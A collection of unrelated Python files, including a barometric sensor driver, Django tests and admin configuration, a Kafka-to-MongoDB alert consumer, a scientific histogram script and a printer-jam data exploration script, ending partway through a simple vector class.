        # Fixed-point scaling per the MPL115A1 datasheet coefficient formats.
        self.a0 = float(self.a0) / (1 << 3)
        self.b1 = float(self.b1) / (1 << 13)
        self.b2 = float(self.b2) / (1 << 14)
        self.c12 = float(self.c12) / (1 << 24)

    def take_readings(self):
        """Trigger a conversion, then read and compensate pressure (kPa)
        and temperature (°C); also derive sea-level pressure P0."""
        self._spi_enable(True)
        self.spi.write(self.CMD_START)
        self._spi_enable(False)
        # Datasheet conversion time: wait before reading the ADC results.
        sleep_ms(3)
        data = bytearray(len(self.CMD_DATA))
        self._spi_enable(True)
        self.spi.write_readinto(self.CMD_DATA, data)
        self._spi_enable(False)
        # 10-bit ADC values, left-justified in 16 bits -> shift right by 6.
        padc = ((data[1] << 8) | data[3]) >> 6
        tadc = ((data[5] << 8) | data[7]) >> 6
        # Pressure compensation polynomial from the datasheet.
        pcomp = self.a0 + (self.b1 + self.c12 * tadc) * padc + self.b2 * tadc
        self.P = pcomp * ((1150.0 - 500.0) / 1023.0) + 500.0
        # Barometric formula: reduce measured pressure to mean sea level.
        self.P0 = self.P / pow(1.0 - (self.altitude / 44330.0), 5.255)
        self.T = 25.0 - (tadc - 512.0) / 5.35
if __name__ == '__main__':
    # Demo: read the sensor once and print the results.
    MY_ALTITUDE = 9.0 # metres above mean sea level (AMSL)
    barometer = MPL115A1(altitude=MY_ALTITUDE)
    barometer.take_readings()
    print("Temperature: {}C\nPressure: {}kPa\nP0: {}kPa".format(barometer.T,barometer.P,barometer.P0))
|
from django.test import TestCase
from blog import models
from blog import forms
# Create your tests here.
class BlogModelTest(TestCase):
    """Form-validation tests for BlogForm."""

    def test_valid(self):
        """Verify that valid input produces no validation errors."""
        params = dict(content="test", photo="", anime_id="", anime="", tag="tag,tag、tag", user=1)
        blog = models.Blog()
        form = forms.BlogForm(params, instance=blog)
        self.assertTrue(form.is_valid())

    def test_either1(self):
        """Verify that completely empty input fails validation."""
        params = dict()
        blog = models.Blog()
        form = forms.BlogForm(params, instance=blog)
        self.assertFalse(form.is_valid())
class CommentModelTest(TestCase):
    """Form-validation tests for CommentForm."""

    def test_valid(self):
        """Verify that valid input produces no validation errors."""
        params = dict(comment="test", post=1)
        comment = models.Comment()
        form = forms.CommentForm(params, instance=comment)
        self.assertTrue(form.is_valid())

    def test_either1(self):
        """Verify that completely empty input fails validation."""
        params = dict()
        # Renamed from the misleading local name `blog`: this instance is a
        # Comment, matching test_valid above.
        comment = models.Comment()
        form = forms.CommentForm(params, instance=comment)
        self.assertFalse(form.is_valid())
|
import random
import json
from celery import shared_task
from backend.celery import celery_app
from celery.utils.log import get_logger
@shared_task
def test_task():
    """Trivial Celery smoke-test task: returns a payload with one random
    integer in [0, 100]."""
    return {'data': random.randint(0, 100)}
|
class Solution:
    ## Iterative Solution
    def generate(self, numRows: int) -> List[List[int]]:
        """Return the first numRows rows of Pascal's triangle."""
        triangle = []
        for r in range(numRows):
            # Start every row filled with 1s; only interior cells change.
            row = [1] * (r + 1)
            for c in range(1, r):
                row[c] = triangle[r - 1][c - 1] + triangle[r - 1][c]
            triangle.append(row)
        return triangle
|
##############################################################
# This main file contains an overview of functions that were
# run to do simulations in the thesis of Koen Emmer
# Uncomment functions to run them
# For questions, contact me via LinkedIn
# https://www.linkedin.com/in/koenemmer/
##############################################################
##############################################################
# Import Modules
##############################################################
# Import Python libraries
# Import for BrainFrame
# import matplotlib
from configoptions import *
from reportplots import *
from datasetproposedmethod import *
from datasetsformodeldesign import *
from monopolar_simulations import *
from bipolar_simulations import *
##############################################################
# Build datasets for
##############################################################
# runwave("ClassicModel", "square", "complete", "saveall")
# runwave("ClassicModel", "sine", "complete", "saveall")
# runsquarewaveCB("ClassicModel", "complete", "saveall")
# runwave("ProposedModel", "square", "complete", "saveall")
# runwave("ProposedModel", "sine", "complete", "saveall")
# runsquarewaveCB("ProposedModel", "complete", "saveall")
##############################################################
# Find blocking amplitudes via proposed method
##############################################################
# squarewaveresults()
# sineresults()
# assymmetricalresults()
##############################################################
# Plot single KHFAC simulation
##############################################################
# plot_square_classic(tstop=20)
# plot_sine_classic()
# plot_assymmetric_classic(f=10, a=0.2, tstop = 50.0, chargebalance=0.1, intrinsic=1)
# plot_square_proposed(f=10, a=0.47)
# plot_sine_proposed(f=10, a=0.52)
# plot_assymmetric_classic(f=10, a=0.55, tstop = 51.0, chargebalance=0.8, intrinsic=1)
# plot_assymmetric_classic(f=10, a=0.6, tstop = 51.0, chargebalance=0.9, intrinsic=1)
# plot_assymmetric_proposed(f=10, a=0.19, chargebalance=0.1)
# plot_assymmetric_proposed(f=10, a=0.2, chargebalance=0.1)
# plot_assymmetric_proposed(f=10, a=0.6, chargebalance=0.9)
# plot_sine_proposed(10,0.52)
# plot_sine_proposed(10,0.45)
# plot_sine_proposed(40,0.66)
# plot_sine_proposed(40,0.60)
# plot_square_proposed_bipolar(10,1.0)
##############################################################
# Plot and test waveforms (uncomment one of the lines together with the last two lines to produce a picture
##############################################################
# t_signal, i_signal = sinewave(0, 0.1, 10, 1, 1000)
# t_signal, i_signal = chargebalanced_asymmetrical(0, 2.0, 1, 0.06, 0.8, 0.1, 0.1)
# t_signal, i_signal = chargebalanced_asymmetrical(0, 0.1, 10, 0.05, 0.9)
# t_signal, i_signal = trianglewave(0, 0.1, 10, 1)
# t_signal, i_signal = squarewave_ip(0, 0.2, 10, 1, 0.1, 0.1)
# t_signal, i_signal = squarewave(0, 0.2, 10, 1)
# t_signal, i_signal = stepwave(0, 0.1, 10, 2, 3)
# t_signal, i_signal = stepwave_sine(0, 0.1, 10, 1, 20)
# plot_signal(plt, t_signal, i_signal)
# plt.show()
##############################################################
# Monopolar simulations -> create result files
##############################################################
# monopolar_triangularwave_results()
# monopolar_sinewave_results()
# monopolar_squarewave_results()
# monopolar_step("triangular")
# monopolar_step("sine")
# monopolar_assymmetricalwave_results()
# squarewave_ipd_results()
# monopolar_squarewave_realdistance_results()
# squarewave_ipd_results("validation")
##############################################################
# Bipolar simulations -> create result files
##############################################################
# bipolar_squarewave_ETAdistance_IECdistance_parallel_results()
# bipolar_squarewave_ETAdistance_IECdistance_parallel_results(zoom=True)
# bipolar_squarewave_IECdistance_results('parallel')
# bipolar_squarewave_IECdistance_results('perpendicular')
# bipolar_squarewave_orientation_results('x')
# bipolar_squarewave_orientation_results('z')
##############################################################
# Build report plots
##############################################################
## Background chapter
# plotAP()
# plotKHFACdemogates()
# plothminftau()
## Method chapter
# plot_2D_blockdescription()
# plot_3D_blockdescription()
# plot_gates_proposedmethodsetup()
# plot_asymmetrical_waveform()
# justificationplots("sine")
# justificationplots("square")
# justificationplots("squareCB")
## Results Chapter
# Monopolar plots
# plot_monopolar("monopolar_basic_waveforms", "amplitude")
# plot_monopolar("monopolar_basic_waveforms", "cpp")
# plot_monopolar("stepfunctions", "amplitude")
# plot_monopolar("stepfunctions", "cpp")
# plot_monopolar("asymmetrical", "amplitude", "colour")
# plot_monopolar("asymmetrical", "cpp", "colour")
# plot_monopolar("asymmetrical", "amplitude", "3D")
# plot_monopolar("asymmetrical", "cpp", "3D")
# plot_monopolar("asymmetrical", "amplitude", "singlefrequency", 10)
# plot_monopolar("squarewave_ipd", "amplitude", "lines")
# plot_monopolar("squarewave_ipd", "cpp", "lines")
# plot_monopolar("squarewave_ipd", "amplitude", "colour")
# plot_monopolar("squarewave_ipd", "cpp", "colour")
# plot_monopolar("squarewave_ipd", "amplitude", "3D")
# plot_monopolar("squarewave_ipd", "cpp", "3D")
# plot_monopolar("squarewave_ipd_validation", "amplitude", "lines")
# plot_monopolar("squarewave_ipd_validation", "cpp", "lines")
# plot_monopolar("squarewave_ipd_validation", "amplitude", "colour")
# plot_monopolar("squarewave_ipd_validation", "cpp", "colour")
# plot_monopolar("realdistance", "amplitude")
# plot_monopolar("realdistance", "cpp")
# Bipolar plots
# plot_bipolar("ETA_IEC_parallel", "amplitude", "lines")
# plot_bipolar("ETA_IEC_parallel", "cpp", "lines")
# plot_bipolar("ETA_IEC_parallel", "amplitude", "colour")
# plot_bipolar("ETA_IEC_parallel", "cpp", "colour")
# plot_bipolar("ETA_IEC_parallel", "amplitude", "3D")
# plot_bipolar("ETA_IEC_parallel", "cpp", "3D")
# plot_bipolar("ETA_IEC_parallel", "amplitude", "optimal")
# plot_bipolar("ETA_IEC_parallel", "amplitude", "lines", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "cpp", "lines", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "amplitude", "colour", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "cpp", "colour", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "amplitude", "3D", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "cpp", "3D", zoom=True)
# plot_bipolar("ETA_IEC_parallel", "amplitude", "optimal", zoom=True)
# plot_bipolar("IEC_parallelperpendicular", "amplitude")
# plot_bipolar("IEC_parallelperpendicular", "cpp")
# plot_bipolar("orientation", "amplitude")
## Discussion plots
# plot_asymmetrical_bipolar(0.001)
# plot_ipdbasicimplementation(0.25,0.25)
# plot_ipdbasicimplementation(0,0.5)
# plot_ipdcompleximplementation()
# plot_ipd_validation(0.4,0,0)
##############################################################
## Build presentation plots
##############################################################
# buildKHFACgif()
quitNeuron()  # defined in one of the star-imported modules; presumably shuts the NEURON simulator down cleanly — TODO confirm
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
from django.urls import reverse
from django.utils.html import format_html
from .models.Person import Person
from .models.Affiliation import Affiliation
from .models.Organization import Organization,OrgRelationship
from .models.Resource import Resource,Collaboration
from .models.Publication import Publication
from .models.Identity import Identity
from .models.Expression import Expression
from .models.BioProject import BioProject
from .models.Structure import Structure
from .models.Sample import Sample
from .models.ReadsArchive import ReadsArchive
from .models.Assembly import Assembly
from .models.Barcode import Barcode
from .models.ResourceRelation import ResourceRelation
from .models.RKeyword import RKeyword
from .models.ExternalId import ExternalId
from .models.ResourceProperty import ResourceProperty
from .models.Job import Job
from .models.Tool import Tool
# Models registered with the default ModelAdmin (no custom admin options).
admin.site.register(Identity)
admin.site.register(RKeyword)
admin.site.register(Affiliation)
admin.site.register(ResourceProperty)
admin.site.register(ExternalId)
@admin.register(Sample)
class SampleArchiveAdmin(admin.ModelAdmin):
    # Admin for Sample: searchable taxon FK widget, name/description search.
    autocomplete_fields = ["ncbi_tax"]
    search_fields = ["name","description"]
    list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Tool)
class ToolArchiveAdmin(admin.ModelAdmin):
    # Admin for Tool; same options as the other resource-like admins.
    autocomplete_fields = ["ncbi_tax"]
    search_fields = ["name","description"]
    list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(ReadsArchive)
class ReadsArchiveAdmin(admin.ModelAdmin):
    # Admin for ReadsArchive; same options as the other resource-like admins.
    autocomplete_fields = ["ncbi_tax"]
    search_fields = ["name","description"]
    list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Resource)
class ResourceAdmin(admin.ModelAdmin):
    # Base resource admin; AssemblyAdmin below subclasses this.
    autocomplete_fields = ["ncbi_tax"]
    search_fields = ["name","description"]
    list_display = ["name", "description", "deprecated", "updated_at"]

    # def link(self, obj):
    #     # https://en.proft.me/2014/10/12/reversing-admin-urls-django/
    #     return format_html('<a href="{url}?pdb_id={{pdb_id}}">Resources</a>',
    #                        pdb_id=obj.id, url=reverse('admin:bioresources_resource_changelist'))
@admin.register(ResourceRelation)
class ResourceRelationAdmin(admin.ModelAdmin):
    # Both FK endpoints of a relation use autocomplete widgets.
    autocomplete_fields = ["source", "target"]
@admin.register(Expression)
class ExpressionAdmin(admin.ModelAdmin):
    # Admin for Expression; same options as the other resource-like admins.
    autocomplete_fields = ["ncbi_tax"]
    search_fields = ["name","description"]
    list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(BioProject)
class BioProjectAdmin(admin.ModelAdmin):
    # Admin for BioProject; same options as the other resource-like admins.
    autocomplete_fields = ["ncbi_tax"]
    search_fields = ["name","description"]
    list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Assembly)
class AssemblyAdmin(ResourceAdmin):
    # NOTE(review): subclasses ResourceAdmin yet redeclares the exact same
    # options — the three lines below are redundant unless divergence is
    # planned; confirm before removing.
    autocomplete_fields = ["ncbi_tax"]
    search_fields = ["name","description"]
    list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Organization)
class OrganizationAdmin(admin.ModelAdmin):
    # Search spans the related source's name via the source__name lookup.
    search_fields = ["name","description","source__name"]
    autocomplete_fields = ["source"]
    list_display = ["name", "description","country","source", "deprecated", "updated_at"]

    def get_queryset(self, request):
        # select_related avoids an extra query per row when rendering the
        # "source" column in the changelist.
        qs = super(OrganizationAdmin, self).get_queryset(request)
        return qs.select_related("source")
# @admin.register(OrgRelationship)
# class OrgRelationshipAdmin(admin.ModelAdmin):
# search_fields = ["source__name","target__name","source__description","target__description"]
# autocomplete_fields = ["source","target"]
# list_display = ["source","target" ]
#
# def get_queryset(self, request):
#
# qs = super(OrgRelationshipAdmin, self).get_queryset(request)
#
# return qs.select_related("source","target")
@admin.register(Structure)
class StructureAdmin(admin.ModelAdmin):
    # Admin for Structure; same options as the other resource-like admins.
    autocomplete_fields = ["ncbi_tax"]
    search_fields = ["name","description"]
    list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Barcode)
class BarcodeAdmin(admin.ModelAdmin):
    # Admin for Barcode; same options as the other resource-like admins.
    autocomplete_fields = ["ncbi_tax"]
    search_fields = ["name","description"]
    list_display = ["name", "description", "deprecated", "updated_at"]
@admin.register(Publication)
class PublicationAdmin(admin.ModelAdmin):
    """Admin for Publication with a per-row link to its related resources."""
    autocomplete_fields = ["ncbi_tax"]
    list_display = ["name", "description", "links"]
    search_fields = ["name", "description"]

    def links(self, obj):
        # https://en.proft.me/2014/10/12/reversing-admin-urls-django/
        # BUG FIX: '{{pdb_id}}' is an *escaped* brace under format_html
        # (str.format semantics), so the rendered URL literally contained
        # the text '{pdb_id}' and the pdb_id kwarg was never substituted.
        return format_html('<a href="{url}?pdb_id={pdb_id}">Resources</a>',
                           pdb_id=obj.id, url=reverse('admin:bioresources_resource_changelist'))
@admin.register(Job)
class JobAdmin(admin.ModelAdmin):
    # NOTE(review): search_fields references name/description but
    # list_display shows id/user/status — confirm Job actually has
    # name/description fields.
    autocomplete_fields = ["user"]
    list_display = ["id", "user", "status"]
    search_fields = ["name", "description"]
@admin.register(Person)
class PersonAdmin(admin.ModelAdmin):
    # People are searched and listed by surname, then name.
    search_fields = [ "surname", "name"]
    list_display = [ "surname", "name"]
@admin.register(Collaboration)
class CollaborationAdmin(admin.ModelAdmin):
    # NOTE(review): search_fields on bare FK names ("person", "resource")
    # normally needs a related lookup (e.g. "person__name") — confirm this
    # does not raise at search time.
    autocomplete_fields = [ "person", "resource"]
    search_fields = [ "person", "resource"]
    list_display = [ "person", "resource"]
'''
@Author: Sankar
@Date: 2021-04-08 13:37:25
@Last Modified by: Sankar
@Last Modified time: 2021-04-08 13:38:09
@Title : Basic_Python-28
'''
'''
Write a Python program to clear the screen or terminal.
'''
import os, sys

# FIX: 'cls' only exists on Windows; use 'clear' on POSIX systems so the
# script works cross-platform. os.name is 'nt' on Windows.
os.system("cls" if os.name == "nt" else "clear")
#!/usr/bin/python3
import argparse
import numpy as np
import matplotlib.pyplot as plt
from math import floor, ceil
from decimal import Decimal
def read_file(ifile: str, ofile: str, bin_size: float) -> None:
    """Read an xyz trajectory of 2-atom frames, compute the interatomic
    distance per frame, and write both the raw distances and a normalized
    p(r) histogram.

    The expected frame layout (from the parsing below): two header lines,
    then one coordinate line per atom ("label x y z"); frames are separated
    by two more header lines. Output goes to '<ofile-stem>_raw.<ext>' (raw
    distances) and '<ofile-stem>.<ext>' (binned p(r)); any '../' prefix in
    ofile is stripped.

    NOTE(review): if the file ends with a blank line the loop breaks before
    reaching the StopIteration handler and nothing is written — confirm the
    input always ends exactly at a frame boundary.
    """
    size = (2, 3)
    coords = np.zeros(size, dtype=float)  # rows: atom 1 and atom 2
    d = []  # one distance per frame
    with open(ifile) as f:
        # Skip the first frame's two header lines.
        next(f)
        next(f)
        while True:
            line = f.readline()
            if not line:
                break
            else:
                data = line.split()
                coords[0, :] = data[1:]  # drop the atom label column
                line = f.readline()
                data = line.split()
                coords[1, :] = data[1:]
                d.append(distance(coords))
                try:
                    # Skip the next frame's two header lines; StopIteration
                    # here means end of file -> write the outputs.
                    next(f)
                    next(f)
                except StopIteration:
                    filename = ''.join(
                        ofile.replace(
                            '../',
                            '').split('.')[
                            :-1])
                    extension = ''.join(ofile.split('.')[-1])
                    # Raw (unbinned) distances, one per line.
                    with open(filename + '_raw.' + extension, 'w') as o:
                        for item in d:
                            o.write("%s\n" % item)
                    distances = np.array(d, dtype=float)
                    result, bin_edges = pofr(distances, bin_size)
                    # Binned p(r): bin centers with their densities.
                    with open(filename + '.' + extension, 'w') as o:
                        txt = "{bin_c:8.6f} \t {val:8.6f} \n"
                        o.write(
                            "# bin_center \t value \t bin_size = {} \n".format(
                                bin_size))
                        for value, edge in zip(result, bin_edges[:-1]):
                            o.write(
                                txt.format(
                                    val=value,
                                    bin_c=(edge + float(bin_size) / 2.0)))
                    return
def distance(c):
    """Euclidean distance between the two points stored as rows of c
    (a 2x3 array)."""
    delta = c[0, :] - c[1, :]
    return np.sqrt(np.dot(delta, delta))
def round_down(div, *args):
    """Round each argument down to the nearest multiple of ``div``.

    Returns a list with one result per argument. Decimal(str(v)) reduces
    error from binary fractions before the division; round(..., 5) keeps
    enough precision for all reasonable bin sizes.
    See also:
    https://stackoverflow.com/questions/6189956/easy-way-of-finding-decimal-places
    """
    return [round(div * floor(float(Decimal(str(v))) / div), 5) for v in args]
def pofr(d, bin_size):
    """Bin the distances in ``d`` into a normalized histogram p(r).

    Returns (hist, bin_edges) as produced by np.histogram with density=True.
    Side effect: also plots the histogram and saves it as a PNG.

    NOTE(review): the savefig filename comes from the module-level ``args``
    (argparse namespace) rather than a parameter — this function cannot be
    used without the CLI entry point having run first.
    """
    # find lowest datapoint
    d_min = d.min()
    # round_down to bin multiple
    d_min = round_down(bin_size, d_min)[0]
    # create bins
    n_bins = int(ceil((d.max()-d_min)/bin_size))
    # get d.max()
    d_max = (d_min + n_bins * bin_size)
    # create histogram
    hist, bin_edges = np.histogram(d,
                                   bins=n_bins,
                                   range=(d_min, d_max),
                                   density=True)
    # arguments are passed to np.histogram
    plt.hist(d, density=True, bins=n_bins, range=(d_min, d_max))
    plt.title("N-N p(r)")
    plt.xlabel("r")
    plt.ylabel("p(r)")
    plt.savefig(
        "{0}.png".format(
            args.output.replace(
                "../",
                "").replace(
                ".dat",
                "")))
    # fig.show()
    return hist, bin_edges
if __name__ == "__main__":
    # CLI: -i input xyz file (required), -o output p(r) file, -b bin size.
    parser = argparse.ArgumentParser(
        description='Generate the p(r) for an xyz file with only 2 atoms')
    parser.add_argument(
        '--input',
        '-i',
        help='Path to the input xyz file',
        required=True)
    parser.add_argument(
        '--output',
        '-o',
        help='Path to the output p(r) file',
        default='pr.dat')
    parser.add_argument(
        '--bin_size',
        '-b',
        help='Bin size. Default = 0.1',
        default='0.1')
    # args is module-global: pofr() reads args.output for its PNG filename.
    args = parser.parse_args()
    read_file(args.input, args.output, float(args.bin_size))
|
"""
Module to read alerts from the Kafka topic ("alerts_topic") where Flink applications post alerts and then put them in MongoDB.
"""
from kafka import KafkaConsumer, TopicPartition
import json, pymongo, datetime
from pymongo import MongoClient
def insert_records(records):
    """Upsert alert records into the module-level Mongo collection ``db``.

    Records whose key is one of the placeholder "nothing found" keys are
    skipped. window_start/window_end arrive as epoch milliseconds and are
    converted to datetime before storage. The upsert is keyed on
    (alert_name, window_start, window_end, key).
    """
    # BUG FIX: the placeholder list previously contained an entry missing
    # its surrounding braces ('"url":"__NO_URLS_FOUND__"') and a *set*
    # literal instead of a string for the user_mention placeholder, so
    # those two kinds of empty-key alerts were never filtered out.
    empty_keys = (
        '{"hashtag":"__NO_HASHTAG_FOUND__"}',
        '{"url":"__NO_URLS_FOUND__"}',
        '{"user_mention":"__NO_MENTIONS_FOUND__"}',
    )
    for record in records:
        # No need to display alerts for empty keys
        if record['key'] in empty_keys:
            continue
        record['window_start'] = datetime.datetime.fromtimestamp(record['window_start']/1000)
        record['window_end'] = datetime.datetime.fromtimestamp(record['window_end']/1000)
        db.update({'alert_name':record['alert_name'], 'window_start':record['window_start'], 'window_end':record['window_end'],
                   'key':record['key']}, record, upsert=True)
if __name__ == "__main__":
    # Module-global Mongo collection used by insert_records().
    db = MongoClient('mongodb://localhost:27017/')['alerts'].alerts
    consumer = KafkaConsumer(group_id='flink_out_consumers', value_deserializer=json.loads)
    # Consume a single explicit partition of the alerts topic.
    partition = TopicPartition('alerts_topic',0)
    consumer.assign([partition])
    print(consumer.assignment())
    # consumer.seek_to_beginning()
    # Poll forever; any failure is logged and the loop continues.
    while(True):
        try:
            ret = consumer.poll(10000) # polls for 10 seconds
            if ret != {}:
                records = [record.value for record in ret[partition]]
                print(records)
                insert_records(records)
            print('Ended poll')
        except Exception as e:
            print(e)
            continue
import pandas as pd
import numpy as np
import xgboost as xgb
from sklearn.model_selection import train_test_split
from sklearn.impute import SimpleImputer
from matplotlib import pyplot as plt
import seaborn as sns
import os
from pycomp.viz.insights import *
# Project variables
DATA_PATH = 'C:/Work/HP/dataset'
TRAIN_FILENAME = 'Fin_H2-6703.csv'
# TEST_FILENAME = 'test.csv'
# Reading training data
df = pd.read_csv(os.path.join(DATA_PATH, TRAIN_FILENAME))
df.head()
# Shared axes for the kde plots further below; NOTE(review): the pycomp
# plot_* helpers appear to manage their own figures — confirm this fig/ax
# is actually used by them.
figsize = (10, 7)
fig, ax = plt.subplots(figsize=figsize)
format_spines(ax=ax, right_border=False)
# Jam rate
# df['Pass / Fail'] = df['Pass / Fail'].replace('none', '1')
# 'none' entries are treated as no-jam ('0') before plotting.
df['Pass / Fail'] = df['Pass / Fail'].replace('none', '0')
jam_map = {'1': 'Jam', '0': 'NoJam'}
jam_colors = ['crimson', 'darkslateblue']
plot_donut_chart(df=df, col='Pass / Fail', label_names=jam_map, colors=jam_colors,
                 title='Absolute Total and Percentual of Pass/Fail Results')
"""
# Countplot for duplex
duplex_colors = ['lightskyblue', 'lightcoral']
duplex_map = {'0': 'Simplex', '1': 'Duplex'}
plot_countplot(df=df, col='Duplex', palette=duplex_colors, label_names=duplex_map,
title='Total Jam Case by Duplex')
# Jam rate by duplex
plot_countplot(df=df, col='Pass / Fail', hue='Duplex', label_names=jam_map, palette=duplex_colors,
title="Could duplex had some influence on Jam Error?")
# Plotting a double donut chart
plot_double_donut_chart(df=df, col1='Pass / Fail', col2='Duplex', label_names_col1=jam_map,
colors1=['crimson', 'navy'], colors2=['lightcoral', 'lightskyblue'],
title="Did the duplex influence on jam rate?")
"""
"""
# Countplot for Target Bin
# df['Target Bin'] = df['Target Bin'].replace('none', '2')
df['Target Bin'] = df['Target Bin'].replace('none', '1')
target_bin_colors = ['lightskyblue', 'lightcoral']
target_bin_map = {'2': 'Target Bin:2', '1': 'Target Bin:else'}
plot_countplot(df=df, col='Target Bin', palette=target_bin_colors, label_names=target_bin_map,
title='Total Jam Case by Target Bin')
# Jam rate by Target Bin
plot_countplot(df=df, col='Pass / Fail', hue='Target Bin', label_names=jam_map, palette=target_bin_colors,
title="Could Target Bin had some influence on Jam Error?")
"""
"""
# Countplot for Error Code
# df['Error Code'] = df['Error Code'].replace('none', '703')
df['Error Code'] = df['Error Code'].replace('none', '0')
error_code_colors = ['lightskyblue', 'lightcoral']
error_code_map = {'703': 'Error:703', '0': 'Else'}
plot_countplot(df=df, col='Error Code', palette=error_code_colors, label_names=error_code_map,
title='Total Jam Case by Error Code')
# Jam rate by Error Code
plot_countplot(df=df, col='Pass / Fail', hue='Error Code', label_names=jam_map, palette=error_code_colors,
title="Could Error Code had some influence on Jam Error?")
"""
"""
# Countplot for Eos >> ID
# df['Eos >> ID'] = df['Eos >> ID'].replace('none', '0')
# df['Eos >> ID'] = df['Eos >> ID'].replace('none', '1')
df['Eos >> ID'] = df['Eos >> ID'].replace('none', '2')
eos_id_colors = ['lightskyblue', 'lightcoral', 'navy']
eos_id_map = {'0': '0', '1': '1', '2': '2'}
plot_countplot(df=df, col='Eos >> ID', palette=eos_id_colors, label_names=eos_id_map,
title='Total Jam Case by Eos >> ID')
# Jam rate by Error Code
plot_countplot(df=df, col='Pass / Fail', hue='Eos >> ID', label_names=jam_map, palette=eos_id_colors,
title="Could Eos >> ID had some influence on Jam Error?")
"""
"""
# Countplot for EosFull
eosfull_colors = ['lightskyblue', 'lightcoral']
eosfull_map = {'10': '10', '20': '20'}
plot_countplot(df=df, col='Eos - Full', palette=eosfull_colors, label_names=eosfull_map,
title='Total Jam Case by Eos - Full')
# Jam rate by Eos - Full
plot_countplot(df=df, col='Pass / Fail', hue='Eos - Full', label_names=jam_map, palette=eosfull_colors,
title="Could duplex had some influence on Jam Error?")
# Plotting a double donut chart
plot_double_donut_chart(df=df, col1='Pass / Fail', col2='Eos - Full', label_names_col1=jam_map,
colors1=['crimson', 'navy'], colors2=['lightcoral', 'lightskyblue'],
title="Did the Eos - Full influence on jam rate?")
"""
"""
# Distribution of EosVal variable
plot_distplot(df=df, col='EosVal', title="EosVal Distribution")
# plot_distplot(df=df, col='EosVal', hue='Pass / Fail', kind='kde',
# title="Is there any relationship between EosVal distribution\n from jam and no jam case?")
ax.set_title("Is there any relationship between EosVal distribution\n from jam and no jam case?", size=16)
sns.kdeplot(df[df['Pass / Fail']=='0']['EosVal'], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1']['EosVal'], ax=ax, color='r', shade=True, Label='1')
"""
"""
# Distribution of EXIT ID variable
feature_name = 'EXIT ID'
df[feature_name] = df[feature_name].replace('none', np.nan)
df[feature_name] = df[feature_name].fillna(df[feature_name].median())
print(f'Median value of {feature_name} : {df[feature_name].median()}')
plot_distplot(df=df, col=feature_name, title="EXIT ID Distribution")
ax.set_title("Is there any relationship between EXIT ID distribution\n from jam and no jam case?", size=16)
sns.kdeplot(df[df['Pass / Fail']=='0'][feature_name], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1'][feature_name], ax=ax, color='r', shade=True, Label='1')
"""
"""
# Distribution of IDInfo_ID variable
feature_name = 'IDInfo_ID'
df[feature_name] = df[feature_name].replace('none', np.nan)
df[feature_name] = df[feature_name].fillna(df[feature_name].median())
print(f'Median value of {feature_name} : {df[feature_name].median()}')
plot_distplot(df=df, col=feature_name, title="IDInfo_ID Distribution")
ax.set_title("Is there any relationship between IDInfo_ID distribution\n from jam and no jam case?", size=16)
sns.kdeplot(df[df['Pass / Fail']=='0'][feature_name], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1'][feature_name], ax=ax, color='r', shade=True, Label='1')
"""
"""
# Distribution of ID - Eos variable
feature_name = 'ID - Eos'
df[feature_name] = df[feature_name].replace('none', np.nan)
df[feature_name] = df[feature_name].fillna(df[feature_name].median())
print(f'Median value of {feature_name} : {df[feature_name].median()}')
plot_distplot(df=df, col=feature_name, title="ID - Eos Distribution")
ax.set_title("Is there any relationship between ID - Eos distribution\n from jam and no jam case?", size=16)
sns.kdeplot(df[df['Pass / Fail']=='0'][feature_name], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1'][feature_name], ax=ax, color='r', shade=True, Label='1')
"""
"""
# Distribution of Exit - ID variable
feature_name = 'Exit - ID'
df[feature_name] = df[feature_name].replace('none', np.nan)
df[feature_name] = df[feature_name].fillna(df[feature_name].median())
print(f'Median value of {feature_name} : {df[feature_name].median()}')
plot_distplot(df=df, col=feature_name, title="Exit - ID Distribution")
ax.set_title("Is there any relationship between Exit - ID distribution\n from jam and no jam case?", size=16)
sns.kdeplot(df[df['Pass / Fail']=='0'][feature_name], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1'][feature_name], ax=ax, color='r', shade=True, Label='1')
"""
# Distribution of Del - Exit variable
feature_name = 'Del - Exit'
# Replace 'none' with NaN, then impute with the column median.
df[feature_name] = df[feature_name].replace('none', np.nan)
df[feature_name] = df[feature_name].fillna(df[feature_name].median())
print(f'Median value of {feature_name} : {df[feature_name].median()}')
plot_distplot(df=df, col=feature_name, title="Del - Exit Distribution")
ax.set_title("Is there any relationship between Del - Exit distribution\n from jam and no jam case?", size=16)
# NOTE(review): 'Label' (capital L) is not seaborn's 'label' kwarg — it is
# forwarded to matplotlib; confirm the legend labels actually appear.
sns.kdeplot(df[df['Pass / Fail']=='0'][feature_name], ax=ax, color='b', shade=True, Label='0')
sns.kdeplot(df[df['Pass / Fail']=='1'][feature_name], ax=ax, color='r', shade=True, Label='1')
# print(df[df['Pass / Fail']=='0'][feature_name].count())
# pd.set_option('display.max_rows', 500)
# print(df[df['Pass / Fail']=='0'][feature_name])
plt.show()
|
'''
super simple vector class and vector functionality. i wrote this simply because i couldn't find
anything that was easily accessible and quick to write. this may just go away if something more
comprehensive/mature is found
'''
import math
class MatrixException(Exception):
    '''Raised when a Matrix is constructed or mutated with inconsistently sized data.'''
    pass
class Vector(object):
    '''Minimal 3/4-component vector.

    The vector behaves as a 4-vector whenever ``w`` is not None, otherwise
    as a 3-vector.  The constructor also accepts a single list/tuple of 3
    or 4 components as the first argument.
    '''
    #__slots__ = ('x','y','z','w')
    def __init__( self, x=0, y=0, z=0, w=None ):
        self.x = x
        self.y = y
        self.z = z
        self.w = w
        # a sequence passed as the first argument supplies all components
        if isinstance(x,(list,tuple)):
